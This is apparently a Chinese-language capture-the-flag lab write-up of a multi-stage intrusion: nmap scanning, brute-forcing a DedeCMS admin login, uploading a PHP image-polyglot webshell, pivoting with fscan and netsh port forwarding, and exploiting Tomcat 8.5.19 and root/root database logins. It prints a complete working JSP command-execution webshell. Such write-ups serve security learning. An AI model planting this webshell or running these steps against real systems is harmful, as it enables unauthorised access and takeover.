渗透复现

初步接触

先进行主机发现

nmap 172.16.17.0/24 -p 80 先指定扫描80端口的

渗透复现_第1张图片

nmap 172.16.17.0/24

做的时候,一直没有发现之间有一个输入成了逗号

渗透复现_第2张图片

渗透复现_第3张图片

根据上面的结果,就可以知道了

我们会看到有几个open,应该就是这两个了

渗透复现_第4张图片

就会发现是可以的,然后访问看看

177是可以访问的

渗透复现_第5张图片

134出现异常,做的时候以为是一个错的后面就没有想利用了

就先看177的,回到页面,看到底部有一个关键的信息,搜一下看看,加上dede就会发现后台管理页面

渗透复现_第6张图片

抓包爆破一下,就会看到密码是1q2w3e4r 登陆成功

做题的时候sha了 ,没有发现这个答案....

会员中心--内容中心--个人空间--文章发表下,发现了文件上传漏洞

打开会员中心之后,把会员功能打开,找到图像就可以发现上传点了

渗透复现_第7张图片

渗透复现_第8张图片

上传个一句话木马文件上去

发现不可以

其他师傅说需要改后缀

上传一个图片马,用bp抓包,改后缀为p*hp

copy 1.jpg/b+1.php/a 2.jpg

渗透复现_第9张图片

成功回显路径,然后连接不成功,等一下再来看看

在核心的文件式管理器上也发现了,试了一下居然可以成功

渗透复现_第10张图片

蚁剑连接成功就可以看到flag3了,文件路径.....

flag3{cf1e8c14e54505f60aa10ceb8d5d8ab3}

渗透复现_第11张图片

织梦数据库配置文件在/data/common.inc.php,这个也是后面才知道的

渗透复现_第12张图片

渗透复现_第13张图片

然后添加数据,进行连接,连接成功

渗透复现_第14张图片

 有一个答案在dede_admin 下

 在添加配置里面输入相应的内容,flag1就会出现了,在dede库的dede_admin表中有flag1渗透复现_第15张图片

这两个都比较难找一点

外网的差不多就结束

进入内网的前提也是要知道ip

获取当前主机的ip

渗透复现_第16张图片

 是什么权限,我们用whoami命令

渗透复现_第17张图片

直接就是管理员权限,不需要我们提权

ipconfig

渗透复现_第18张图片

上传 fscan.exe

找到内网ip192.168.31.20

渗透复现_第19张图片

 右键终端中输入命令

-fscan64 -h 192.168.31.20/24

渗透复现_第20张图片

 说明存在内网靶机192.16.31.131

端口转发一下

netsh interface portproxy add v4tov4 listenport=88   connectaddress=192.168.31.131 connectport=80

查看是否设置成功

netsh interface portproxy show all

端口设置成功
渗透复现_第21张图片

 访问88这个端口,访问成功

渗透复现_第22张图片

 Apache Tomcat/8.5.19,直接搜漏洞

88/manger

渗透复现_第23张图片

 被拒绝了

一文了解Tomcat/8.5.19文件上传漏洞复现_tomcat8.5漏洞-CSDN博客

【Tomcat-8.5.19】文件写入漏洞_apache tomcat/8.5.19_夭-夜的博客-CSDN博客

上传jsp一句话木马


<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>






<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "
");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr);
                disr = dis.readLine();
                }
        }
%>

刷新抓包加上以上的东西,再修改一下

渗透复现_第24张图片

上传成功

渗透复现_第25张图片

  ls /

 渗透复现_第26张图片

 渗透复现_第27张图片

flag11{8f72e28063c30c7468fb6af4653f4f9c}

 再访问另外一个端口

渗透复现_第28张图片

 【漏洞复现】CVE-2023-28432 MinIO集群模式信息泄露漏洞_minio漏洞-CSDN博客

 照着来了一下,结果...

需要改一下端口

netsh interface portproxy add v4tov4 listenport=7777  connectaddress=192.168.31.131 connectport=9001

渗透复现_第29张图片

 然后还是访问不行

记得之前还有一个ip   172.16.17.134

用dirsearch扫一下看看

渗透复现_第30张图片

发现了一些文件,但是和windows上扫出来的结果有点不一样,有个l.php漏了

渗透复现_第31张图片

底部有一个mysql连接

 渗透复现_第32张图片

 弱口令root/root渗透复现_第33张图片

 刚刚扫的时候还发现/phpMyAdmin/,访问一下看看

渗透复现_第34张图片

 root/root    成功进入渗透复现_第35张图片

 渗透复现_第36张图片

 又是在页面上

在数据库中发现了

渗透复现_第37张图片

 还有一个shell.php,访问看看,出现了一堆东西

渗透复现_第38张图片

 渗透复现_第39张图片

 感觉像是一些查询语句

newyxcms出现较多,搜索看看,真的挺多的

渗透复现_第40张图片

 万万没有想到还有个yxcms的目录,没有想到和这个居然有联系

渗透复现_第41张图片

 小心网站页面,应该还会有信息,果然

渗透复现_第42张图片

 注意要是改成admin,才能输入

 渗透复现_第43张图片

 ss 一下

 渗透复现_第44张图片

 渗透复现_第45张图片

 提示说上传的文件会在default的文件夹下

不知道路径,御剑扫一下

渗透复现_第46张图片

 网站下面有个beifen.rar,访问就可以下载

渗透复现_第47张图片

 文件上传的路径点在\yxcms\protected\apps\default\view\default

渗透复现_第48张图片

 上传成功

渗透复现_第49张图片

 蚁剑连接成功

 渗透复现_第50张图片

 在以下路径发现答案

 渗透复现_第51张图片

 监听和后面的横向移动还需要理解,目前还是...

你可能感兴趣的:(安全,网络,web安全)